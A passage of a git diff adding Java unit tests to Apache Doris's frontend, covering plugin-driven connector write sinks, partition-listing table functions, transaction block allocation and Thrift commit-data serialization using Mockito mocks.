*/ + @Test + public void capabilityLessConnectorGathers() { + SlotReference dataSlot = new SlotReference("data", IntegerType.INSTANCE); + PhysicalConnectorTableSink sink = sink( + table(false, false, ImmutableList.of(), ImmutableList.of(DATA)), + Arrays.asList(DATA), + ImmutableList.of(dataSlot)); + + Assertions.assertSame(PhysicalProperties.GATHER, sink.getRequirePhysicalProperties(), + "a connector declaring neither capability must keep the single-writer GATHER default"); + } + + // ==================== helpers ==================== + + private static PluginDrivenExternalTable table(boolean parallelWrite, boolean requirePartitionSort, + List partitionColumns, List fullSchema) { + PluginDrivenExternalTable table = Mockito.mock(PluginDrivenExternalTable.class); + Mockito.when(table.supportsParallelWrite()).thenReturn(parallelWrite); + Mockito.when(table.requirePartitionLocalSortOnWrite()).thenReturn(requirePartitionSort); + Mockito.when(table.getPartitionColumns()).thenReturn(partitionColumns); + Mockito.when(table.getFullSchema()).thenReturn(fullSchema); + return table; + } + + /** + * Builds a {@link PhysicalConnectorTableSink} exercising only {@code getRequirePhysicalProperties()}. + * Uses CALLS_REAL_METHODS to skip the heavyweight ctor and injects the three fields the method + * reads ({@code targetTable}, {@code cols}, and the single child via the {@code children} field, so + * the real {@code child()} resolves to it). + */ + private static PhysicalConnectorTableSink sink(PluginDrivenExternalTable table, + List cols, List childOutput) { + Plan child = Mockito.mock(Plan.class); + Mockito.when(child.getOutput()).thenReturn(childOutput); + @SuppressWarnings("unchecked") + PhysicalConnectorTableSink sink = + Mockito.mock(PhysicalConnectorTableSink.class, Mockito.CALLS_REAL_METHODS); + Deencapsulation.setField(sink, "targetTable", table); + Deencapsulation.setField(sink, "cols", cols); + Deencapsulation.setField(sink, "children", ImmutableList.of(child)); + return sink; + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/planner/PluginDrivenTableSinkBindingTest.java b/fe/fe-core/src/test/java/org/apache/doris/planner/PluginDrivenTableSinkBindingTest.java new file mode 100644 index 00000000000000..897bfaf7b234ab --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/planner/PluginDrivenTableSinkBindingTest.java @@ -0,0 +1,109 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.planner; + +import org.apache.doris.common.AnalysisException; +import org.apache.doris.connector.ConnectorSessionBuilder; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.handle.ConnectorWriteHandle; +import org.apache.doris.connector.api.write.ConnectorSinkPlan; +import org.apache.doris.connector.api.write.ConnectorWritePlanProvider; +import org.apache.doris.nereids.trees.plans.commands.insert.PluginDrivenInsertCommandContext; +import org.apache.doris.thrift.TDataSink; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; +import java.util.Optional; + +/** + * Binding-context consumption test (P4-T06a §4.2 / gaps G4+G5). + * + *

After the cutover, INSERT OVERWRITE and INSERT ... PARTITION(col=val) against a + * plugin-driven MaxCompute table must keep working. The commands carry the overwrite + * flag and the static partition spec on a {@link PluginDrivenInsertCommandContext}; + * this test pins the consumption seam — that + * {@link PluginDrivenTableSink#bindDataSink} forwards both into the + * {@link ConnectorWriteHandle} handed to the connector's + * {@link ConnectorWritePlanProvider#planWrite}. If this regresses, INSERT OVERWRITE + * silently degrades to append and partition pinning is lost.

+ * + *

(The production side — the command populating the context from the unbound sink — + * is covered by post-cutover manual smoke, per the T06a test-scope decision.)

+ */ +public class PluginDrivenTableSinkBindingTest { + + @Test + public void overwriteAndStaticPartitionFlowToWriteHandle() throws AnalysisException { + RecordingWritePlanProvider provider = new RecordingWritePlanProvider(); + PluginDrivenTableSink sink = newPlanProviderSink(provider); + + PluginDrivenInsertCommandContext ctx = new PluginDrivenInsertCommandContext(); + ctx.setOverwrite(true); + Map staticSpec = new HashMap<>(); + staticSpec.put("pt", "20240101"); + ctx.setStaticPartitionSpec(staticSpec); + + sink.bindDataSink(Optional.of(ctx)); + + ConnectorWriteHandle handle = provider.capturedHandle; + Assertions.assertNotNull(handle, "planWrite must be invoked with a bound write handle"); + Assertions.assertTrue(handle.isOverwrite(), + "INSERT OVERWRITE must propagate ctx.isOverwrite()=true to the connector write handle"); + Assertions.assertEquals(staticSpec, handle.getWriteContext(), + "PARTITION(col=val) must propagate the static partition spec to the write handle"); + } + + @Test + public void absentContextDefaultsToNonOverwriteEmptySpec() throws AnalysisException { + RecordingWritePlanProvider provider = new RecordingWritePlanProvider(); + PluginDrivenTableSink sink = newPlanProviderSink(provider); + + sink.bindDataSink(Optional.empty()); + + ConnectorWriteHandle handle = provider.capturedHandle; + Assertions.assertNotNull(handle); + Assertions.assertFalse(handle.isOverwrite(), + "a plain INSERT must default the connector write handle to non-overwrite"); + Assertions.assertTrue(handle.getWriteContext().isEmpty(), + "a plain INSERT must pass an empty static partition spec"); + } + + private static PluginDrivenTableSink newPlanProviderSink(ConnectorWritePlanProvider provider) { + ConnectorSession session = ConnectorSessionBuilder.create().withCatalogName("mc_cat").build(); + ConnectorTableHandle tableHandle = new ConnectorTableHandle() { }; + // targetTable is unused on the plan-provider bind path; pass null to avoid building a + // full PluginDrivenExternalTable (which would require a catalog + database). + return new PluginDrivenTableSink(null, provider, session, tableHandle, Collections.emptyList()); + } + + /** Records the bound {@link ConnectorWriteHandle} that the sink hands to {@code planWrite}. */ + private static final class RecordingWritePlanProvider implements ConnectorWritePlanProvider { + private ConnectorWriteHandle capturedHandle; + + @Override + public ConnectorSinkPlan planWrite(ConnectorSession session, ConnectorWriteHandle handle) { + this.capturedHandle = handle; + return new ConnectorSinkPlan(new TDataSink()); + } + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/planner/PluginDrivenTableSinkTest.java b/fe/fe-core/src/test/java/org/apache/doris/planner/PluginDrivenTableSinkTest.java new file mode 100644 index 00000000000000..865b0f7aac6e68 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/planner/PluginDrivenTableSinkTest.java @@ -0,0 +1,93 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.planner; + +import org.apache.doris.common.AnalysisException; +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.handle.ConnectorWriteHandle; +import org.apache.doris.connector.api.write.ConnectorSinkPlan; +import org.apache.doris.connector.api.write.ConnectorWritePlanProvider; +import org.apache.doris.thrift.TDataSink; +import org.apache.doris.thrift.TDataSinkType; + +import org.junit.Assert; +import org.junit.Test; + +import java.util.ArrayList; +import java.util.List; +import java.util.Optional; + +/** + * Plan-provider mode tests for {@link PluginDrivenTableSink} (W-phase W5). + * + *

When the connector supplies a {@link ConnectorWritePlanProvider}, the sink + * must delegate {@link PluginDrivenTableSink#bindDataSink} to + * {@link ConnectorWritePlanProvider#planWrite} and adopt the connector-built + * opaque {@link TDataSink} verbatim, passing a {@link ConnectorWriteHandle} that + * carries the bound target table handle and write columns. This is the seam that + * lets connectors whose sink cannot be expressed as a generic + * {@code ConnectorWriteConfig} (maxcompute / iceberg) produce their own + * {@code T*TableSink}; the config-bag path is unaffected.

+ */ +public class PluginDrivenTableSinkTest { + + /** Hand-written {@link ConnectorWritePlanProvider} double recording the delegated call. */ + private static final class RecordingWritePlanProvider implements ConnectorWritePlanProvider { + private final ConnectorSinkPlan plan; + private ConnectorSession seenSession; + private ConnectorWriteHandle seenHandle; + + private RecordingWritePlanProvider(ConnectorSinkPlan plan) { + this.plan = plan; + } + + @Override + public ConnectorSinkPlan planWrite(ConnectorSession session, ConnectorWriteHandle handle) { + this.seenSession = session; + this.seenHandle = handle; + return plan; + } + } + + @Test + public void bindDataSinkDelegatesToWritePlanProvider() throws AnalysisException { + TDataSink expected = new TDataSink(TDataSinkType.MAXCOMPUTE_TABLE_SINK); + RecordingWritePlanProvider provider = + new RecordingWritePlanProvider(new ConnectorSinkPlan(expected)); + ConnectorTableHandle tableHandle = new ConnectorTableHandle() { }; + List columns = new ArrayList<>(); + + // targetTable is null: the plan-provider path never dereferences it (the connector + // resolves table facts from its own tableHandle), so a unit of the delegation needs + // no full PluginDrivenExternalTable. + PluginDrivenTableSink sink = + new PluginDrivenTableSink(null, provider, null, tableHandle, columns); + sink.bindDataSink(Optional.empty()); + + // The connector-built opaque sink is adopted verbatim. + Assert.assertSame(expected, sink.toThrift()); + // The bound facts reach the connector through the write handle. + Assert.assertNotNull(provider.seenHandle); + Assert.assertSame(tableHandle, provider.seenHandle.getTableHandle()); + Assert.assertSame(columns, provider.seenHandle.getColumns()); + Assert.assertFalse(provider.seenHandle.isOverwrite()); + Assert.assertTrue(provider.seenHandle.getWriteContext().isEmpty()); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/service/FrontendServiceImplTest.java b/fe/fe-core/src/test/java/org/apache/doris/service/FrontendServiceImplTest.java index 5c442974eed7c0..c2a3bdb931d86b 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/service/FrontendServiceImplTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/service/FrontendServiceImplTest.java @@ -30,8 +30,6 @@ import org.apache.doris.common.FeConstants; import org.apache.doris.common.util.DatasourcePrintableMap; import org.apache.doris.datasource.InternalCatalog; -import org.apache.doris.datasource.maxcompute.MCTransaction; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; import org.apache.doris.nereids.parser.NereidsParser; import org.apache.doris.nereids.trees.plans.commands.Command; import org.apache.doris.nereids.trees.plans.commands.CreateDatabaseCommand; @@ -66,6 +64,7 @@ import org.apache.doris.thrift.TShowUserResult; import org.apache.doris.thrift.TStatusCode; import org.apache.doris.transaction.GlobalTransactionMgrIface; +import org.apache.doris.transaction.Transaction; import org.apache.doris.transaction.TransactionState; import org.apache.doris.utframe.UtFrameUtils; @@ -310,8 +309,12 @@ public void testShowUser() { public void testGetMaxComputeBlockIdRange() throws Exception { FrontendServiceImpl impl = new FrontendServiceImpl(exeEnv); long txnId = Env.getCurrentEnv().getNextId(); - MCTransaction transaction = new MCTransaction(Mockito.mock(MaxComputeExternalCatalog.class)); - setPrivateField(transaction, "writeSessionId", "session-1"); + // The block-id RPC consumes the generic Transaction SPI (supportsWriteBlockAllocation / + // allocateWriteBlockRange); the live impl is PluginDrivenTransactionManager's connector + // transaction. Mock the interface to pin the RPC's allocate-and-return contract. + Transaction transaction = Mockito.mock(Transaction.class); + Mockito.when(transaction.supportsWriteBlockAllocation()).thenReturn(true); + Mockito.when(transaction.allocateWriteBlockRange("session-1", 1L)).thenReturn(0L, 1L); Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().putTxnById(txnId, transaction); try { diff --git a/fe/fe-core/src/test/java/org/apache/doris/tablefunction/MetadataGeneratorPluginDrivenTest.java b/fe/fe-core/src/test/java/org/apache/doris/tablefunction/MetadataGeneratorPluginDrivenTest.java new file mode 100644 index 00000000000000..3b6d5755a58ea8 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/tablefunction/MetadataGeneratorPluginDrivenTest.java @@ -0,0 +1,116 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.tablefunction; + +import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.datasource.ExternalTable; +import org.apache.doris.datasource.PluginDrivenExternalCatalog; +import org.apache.doris.thrift.TFetchSchemaTableDataResult; +import org.apache.doris.thrift.TRow; +import org.apache.doris.thrift.TStatusCode; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.lang.reflect.Method; +import java.util.Arrays; +import java.util.Collections; +import java.util.List; +import java.util.Optional; + +/** + * Tests for the partitions() TVF dispatch to a {@link PluginDrivenExternalCatalog} + * added by P4-T06c (MetadataGenerator.dealPluginDrivenCatalog). + * + *

Why: after the MaxCompute SPI cutover, a {@code max_compute} catalog is a + * {@link PluginDrivenExternalCatalog}, so the old {@code instanceof MaxComputeExternalCatalog} + * branch no longer matches and the partitions() TVF would fall through to + * "not support catalog". These tests lock in that the new branch routes partition + * listing through the connector SPI (using remote names) and emits one + * single-string-column row per partition, matching the legacy dealMaxComputeCatalog shape.

+ */ +public class MetadataGeneratorPluginDrivenTest { + + private TFetchSchemaTableDataResult invokeDeal(PluginDrivenExternalCatalog catalog, ExternalTable table) + throws Exception { + Method m = MetadataGenerator.class.getDeclaredMethod("dealPluginDrivenCatalog", + PluginDrivenExternalCatalog.class, ExternalTable.class); + m.setAccessible(true); + return (TFetchSchemaTableDataResult) m.invoke(null, catalog, table); + } + + @Test + public void testRoutesToSpiWithRemoteNamesAndBuildsRows() throws Exception { + ConnectorSession session = Mockito.mock(ConnectorSession.class); + Connector connector = Mockito.mock(Connector.class); + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorTableHandle handle = Mockito.mock(ConnectorTableHandle.class); + + PluginDrivenExternalCatalog catalog = Mockito.mock(PluginDrivenExternalCatalog.class); + Mockito.when(catalog.buildConnectorSession()).thenReturn(session); + Mockito.when(catalog.getConnector()).thenReturn(connector); + Mockito.when(connector.getMetadata(session)).thenReturn(metadata); + + ExternalTable table = Mockito.mock(ExternalTable.class); + Mockito.when(table.getRemoteDbName()).thenReturn("remote_db"); + Mockito.when(table.getRemoteName()).thenReturn("remote_tbl"); + + // The SPI must be queried with the REMOTE db/table names, not the local Doris names. + Mockito.when(metadata.getTableHandle(session, "remote_db", "remote_tbl")) + .thenReturn(Optional.of(handle)); + Mockito.when(metadata.listPartitionNames(session, handle)) + .thenReturn(Arrays.asList("pt=1", "pt=2")); + + TFetchSchemaTableDataResult result = invokeDeal(catalog, table); + + Assertions.assertEquals(TStatusCode.OK, result.getStatus().getStatusCode()); + List rows = result.getDataBatch(); + Assertions.assertEquals(2, rows.size()); + Assertions.assertEquals("pt=1", rows.get(0).getColumnValue().get(0).getStringVal()); + Assertions.assertEquals("pt=2", rows.get(1).getColumnValue().get(0).getStringVal()); + Mockito.verify(metadata).getTableHandle(session, "remote_db", "remote_tbl"); + } + + @Test + public void testAbsentHandleYieldsEmptyOkResult() throws Exception { + ConnectorSession session = Mockito.mock(ConnectorSession.class); + Connector connector = Mockito.mock(Connector.class); + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + + PluginDrivenExternalCatalog catalog = Mockito.mock(PluginDrivenExternalCatalog.class); + Mockito.when(catalog.buildConnectorSession()).thenReturn(session); + Mockito.when(catalog.getConnector()).thenReturn(connector); + Mockito.when(connector.getMetadata(session)).thenReturn(metadata); + + ExternalTable table = Mockito.mock(ExternalTable.class); + Mockito.when(table.getRemoteDbName()).thenReturn("remote_db"); + Mockito.when(table.getRemoteName()).thenReturn("remote_tbl"); + Mockito.when(metadata.getTableHandle(session, "remote_db", "remote_tbl")) + .thenReturn(Optional.empty()); + + TFetchSchemaTableDataResult result = invokeDeal(catalog, table); + + Assertions.assertEquals(TStatusCode.OK, result.getStatus().getStatusCode()); + Assertions.assertEquals(Collections.emptyList(), result.getDataBatch()); + Mockito.verify(metadata, Mockito.never()).listPartitionNames(Mockito.any(), Mockito.any()); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/tablefunction/PartitionsTableValuedFunctionPluginDrivenTest.java b/fe/fe-core/src/test/java/org/apache/doris/tablefunction/PartitionsTableValuedFunctionPluginDrivenTest.java new file mode 100644 index 00000000000000..68a21405a36255 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/tablefunction/PartitionsTableValuedFunctionPluginDrivenTest.java @@ -0,0 +1,135 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.tablefunction; + +import org.apache.doris.catalog.DatabaseIf; +import org.apache.doris.catalog.Env; +import org.apache.doris.catalog.TableIf.TableType; +import org.apache.doris.datasource.CatalogMgr; +import org.apache.doris.datasource.PluginDrivenExternalCatalog; +import org.apache.doris.datasource.PluginDrivenExternalTable; +import org.apache.doris.mysql.privilege.AccessControllerManager; +import org.apache.doris.mysql.privilege.PrivPredicate; +import org.apache.doris.nereids.exceptions.AnalysisException; +import org.apache.doris.qe.ConnectContext; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.MockedStatic; +import org.mockito.Mockito; + +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Method; +import java.util.Optional; + +/** + * Tests for the {@code partitions()} TVF analyze gates added by FIX-PART-GATES for + * {@link PluginDrivenExternalCatalog} tables (DDL-C1 / CACHE-C1). + * + *

Why: after the MaxCompute SPI cutover the catalog is a PluginDrivenExternalCatalog + * and its tables are PLUGIN_EXTERNAL_TABLE; the TVF's catalog allow-list and table-type allow-list + * previously rejected both at analyze time, making the (already-wired) BE handler dead code. These + * tests drive the private {@code analyze()} to lock that a partitioned PluginDriven table passes + * both gates, while a non-partitioned one is rejected with the legacy message.

+ * + *

The Batch-D red line (the {@code MaxComputeExternalCatalog} branch must remain) is not deleted + * by this change; the PluginDriven branch is added alongside it.

+ */ +public class PartitionsTableValuedFunctionPluginDrivenTest { + + @Test + public void testAnalyzePassesForPartitionedPluginDrivenTable() throws Exception { + PluginDrivenExternalTable table = Mockito.mock(PluginDrivenExternalTable.class); + Mockito.when(table.getType()).thenReturn(TableType.PLUGIN_EXTERNAL_TABLE); + Mockito.when(table.isPartitionedTable()).thenReturn(true); + + // No exception means the PluginDriven catalog passed the catalog allow-list (SEAM 1) and the + // PLUGIN_EXTERNAL_TABLE passed the REAL table-type allow-list (SEAM 2 -- see invokeAnalyze, + // which runs the genuine DatabaseIf.getTableOrMetaException membership check). + invokeAnalyze(table); + + // WHY (non-vacuous, Rule 9): verifying isPartitionedTable() was actually called proves the + // table was resolved (not null) AND the PluginDriven partition guard (SEAM 3) was reached. + // If table resolution short-circuited (e.g. PLUGIN_EXTERNAL_TABLE removed from the SEAM-2 + // allow-list -> MetaNotFound) or the SEAM-3 branch were deleted, this verify fails. + Mockito.verify(table).isPartitionedTable(); + } + + @Test + public void testAnalyzeThrowsForNonPartitionedPluginDrivenTable() { + PluginDrivenExternalTable table = Mockito.mock(PluginDrivenExternalTable.class); + Mockito.when(table.getType()).thenReturn(TableType.PLUGIN_EXTERNAL_TABLE); + Mockito.when(table.isPartitionedTable()).thenReturn(false); + + // WHY: a PluginDriven table with no partition columns must be rejected with the legacy + // "not a partitioned table" message (mirroring the MaxCompute guard). A mutation that drops + // the SEAM 3 guard makes this assertion red. + InvocationTargetException ex = Assertions.assertThrows(InvocationTargetException.class, + () -> invokeAnalyze(table)); + Assertions.assertTrue(ex.getCause() instanceof AnalysisException); + Assertions.assertTrue(ex.getCause().getMessage().contains("is not a partitioned table"), + "expected 'is not a partitioned table', got: " + ex.getCause().getMessage()); + } + + /** + * Drives the private {@code analyze("ctl","db","t")} on a ctor-bypassed instance (analyze uses + * no instance state), with Env/CatalogMgr/AccessManager mocked to resolve a PluginDriven + * catalog + db. + * + *

The db mock uses {@code CALLS_REAL_METHODS} so the REAL + * {@code DatabaseIf.getTableOrMetaException(name, types...)} default-method allow-list runs + * (SEAM 2): only the single-arg resolver is stubbed to return the table, and {@code + * table.getType()} decides membership. Thus removing {@code PLUGIN_EXTERNAL_TABLE} from the + * production allow-list throws MetaNotFound -> AnalysisException and turns the tests red.

+ */ + private void invokeAnalyze(PluginDrivenExternalTable table) throws Exception { + try (MockedStatic mockedEnv = Mockito.mockStatic(Env.class)) { + Env env = Mockito.mock(Env.class); + mockedEnv.when(Env::getCurrentEnv).thenReturn(env); + + CatalogMgr catalogMgr = Mockito.mock(CatalogMgr.class); + Mockito.when(env.getCatalogMgr()).thenReturn(catalogMgr); + AccessControllerManager accessManager = Mockito.mock(AccessControllerManager.class); + Mockito.when(env.getAccessManager()).thenReturn(accessManager); + Mockito.when(accessManager.checkTblPriv(Mockito.nullable(ConnectContext.class), Mockito.eq("ctl"), + Mockito.eq("db"), Mockito.eq("t"), Mockito.any(PrivPredicate.class))).thenReturn(true); + + PluginDrivenExternalCatalog catalog = Mockito.mock(PluginDrivenExternalCatalog.class); + Mockito.when(catalogMgr.getCatalog("ctl")).thenReturn(catalog); + Mockito.when(catalog.isInternalCatalog()).thenReturn(false); + + // CALLS_REAL_METHODS: run the genuine type allow-list (SEAM 2); stub only the single-arg + // resolver so the real membership check at DatabaseIf.getTableOrMetaException(name,List) + // executes against table.getType(). + DatabaseIf db = Mockito.mock(DatabaseIf.class, Mockito.CALLS_REAL_METHODS); + Mockito.doReturn(table).when(db).getTableOrMetaException("t"); + Mockito.doReturn(Optional.of(db)).when(catalog).getDb("db"); + + PartitionsTableValuedFunction tvf = + Mockito.mock(PartitionsTableValuedFunction.class, Mockito.CALLS_REAL_METHODS); + Method analyze = PartitionsTableValuedFunction.class + .getDeclaredMethod("analyze", String.class, String.class, String.class); + analyze.setAccessible(true); + try { + analyze.invoke(tvf, "ctl", "db", "t"); + } catch (InvocationTargetException e) { + throw e; // surface the wrapped AnalysisException to the caller + } + } + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/transaction/CommitDataSerializerTest.java b/fe/fe-core/src/test/java/org/apache/doris/transaction/CommitDataSerializerTest.java new file mode 100644 index 00000000000000..6f4550bbf4d4e1 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/transaction/CommitDataSerializerTest.java @@ -0,0 +1,158 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.transaction; + +import org.apache.doris.datasource.hive.HMSTransaction; +import org.apache.doris.datasource.iceberg.IcebergTransaction; +import org.apache.doris.qe.ConnectContext; +import org.apache.doris.thrift.TFileContent; +import org.apache.doris.thrift.THivePartitionUpdate; +import org.apache.doris.thrift.TIcebergCommitData; +import org.apache.doris.thrift.TMCCommitData; +import org.apache.doris.thrift.TUpdateMode; + +import org.apache.thrift.TBase; +import org.apache.thrift.TDeserializer; +import org.apache.thrift.TSerializer; +import org.apache.thrift.protocol.TBinaryProtocol; +import org.junit.After; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +import java.util.Arrays; +import java.util.List; + +/** + * Golden-equivalence tests for {@link CommitDataSerializer} and the write + * transactions' {@code addCommitData} overrides (W-phase W3 / W6). + * + *

These pin the contract that the refactored hot path + * (serialize each Thrift commit fragment with {@link TBinaryProtocol} → + * {@link Transaction#addCommitData(byte[])} → deserialize → accumulate) + * produces exactly the same accumulated commit state as the legacy + * concrete-cast path (whole-list {@code updateXxxCommitData}).

+ * + *

The serialization protocol is the red line: the producer + * ({@link CommitDataSerializer}) and the consumers (each transaction's + * {@code addCommitData}) must agree on {@link TBinaryProtocol}. A protocol + * mismatch corrupts the round trip and fails these tests.

+ */ +public class CommitDataSerializerTest { + + private ConnectContext connectContext; + + @Before + public void setUp() { + // HMSTransaction's constructor reads ConnectContext.get(); install one on the thread. + connectContext = new ConnectContext(); + connectContext.setThreadLocalInfo(); + } + + @After + public void tearDown() { + ConnectContext.remove(); + connectContext = null; + } + + private static TMCCommitData mcData(String session, long rowCount, String commitMessage) { + return new TMCCommitData() + .setSessionId(session) + .setRowCount(rowCount) + .setWrittenBytes(rowCount * 8) + .setCommitMessage(commitMessage); + } + + private static THivePartitionUpdate hiveData(String name, long rowCount, String... fileNames) { + return new THivePartitionUpdate() + .setName(name) + .setUpdateMode(TUpdateMode.APPEND) + .setRowCount(rowCount) + .setFileSize(rowCount * 16) + .setFileNames(Arrays.asList(fileNames)); + } + + private static TIcebergCommitData icebergData(String filePath, long rowCount) { + return new TIcebergCommitData() + .setFilePath(filePath) + .setRowCount(rowCount) + .setFileSize(rowCount * 32) + .setFileContent(TFileContent.DATA) + .setPartitionValues(Arrays.asList("2026", "06")); + } + + private static void assertBinaryRoundTrip(TBase original, TBase target) + throws Exception { + byte[] bytes = new TSerializer(new TBinaryProtocol.Factory()).serialize(original); + new TDeserializer(new TBinaryProtocol.Factory()).deserialize(target, bytes); + Assert.assertEquals(original, target); + } + + /** + * The serialization protocol is binary and lossless for every field of each + * commit-payload struct. This is the contract {@link CommitDataSerializer} and + * the {@code addCommitData} overrides both depend on. + */ + @Test + public void binaryProtocolRoundTripIsLossless() throws Exception { + assertBinaryRoundTrip(mcData("session-1", 42L, "bWMtcGF5bG9hZA=="), new TMCCommitData()); + assertBinaryRoundTrip(hiveData("dt=2026-06-06", 7L, "f1", "f2"), new THivePartitionUpdate()); + assertBinaryRoundTrip(icebergData("s3://b/data/0.parquet", 11L), new TIcebergCommitData()); + } + + /** + * Iceberg: feeding each fragment through {@link CommitDataSerializer} accumulates + * the identical list as the legacy whole-list {@code updateIcebergCommitData}. + */ + @Test + public void icebergFeedEqualsLegacyUpdate() { + List input = Arrays.asList( + icebergData("s3://b/data/0.parquet", 11L), + icebergData("s3://b/data/1.parquet", 13L)); + + IcebergTransaction legacy = new IcebergTransaction(null); + legacy.updateIcebergCommitData(input); + + IcebergTransaction viaFeed = new IcebergTransaction(null); + CommitDataSerializer.feed(viaFeed, input); + + Assert.assertEquals(legacy.getCommitDataList(), viaFeed.getCommitDataList()); + Assert.assertEquals(2, viaFeed.getCommitDataList().size()); + } + + /** + * Hive: feeding each fragment through {@link CommitDataSerializer} accumulates + * the identical list as the legacy whole-list {@code updateHivePartitionUpdates}. + */ + @Test + public void hmsFeedEqualsLegacyUpdate() { + List input = Arrays.asList( + hiveData("dt=2026-06-06", 7L, "f1", "f2"), + hiveData("dt=2026-06-07", 9L, "f3")); + + HMSTransaction legacy = new HMSTransaction(null, null, null); + legacy.updateHivePartitionUpdates(input); + + HMSTransaction viaFeed = new HMSTransaction(null, null, null); + CommitDataSerializer.feed(viaFeed, input); + + Assert.assertEquals(legacy.getHivePartitionUpdates(), viaFeed.getHivePartitionUpdates()); + Assert.assertEquals(2, viaFeed.getHivePartitionUpdates().size()); + } + +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/transaction/PluginDrivenTransactionManagerTest.java b/fe/fe-core/src/test/java/org/apache/doris/transaction/PluginDrivenTransactionManagerTest.java new file mode 100644 index 00000000000000..c93d6fefeb3917 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/transaction/PluginDrivenTransactionManagerTest.java @@ -0,0 +1,241 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.transaction; + +import org.apache.doris.catalog.Env; +import org.apache.doris.common.UserException; +import org.apache.doris.connector.api.handle.ConnectorTransaction; + +import org.junit.Assert; +import org.junit.Test; + +import java.util.ArrayList; +import java.util.List; + +/** + * Delegation tests for {@link PluginDrivenTransactionManager} and its internal + * {@code PluginDrivenTransaction} bridge (W-phase W4). + * + *

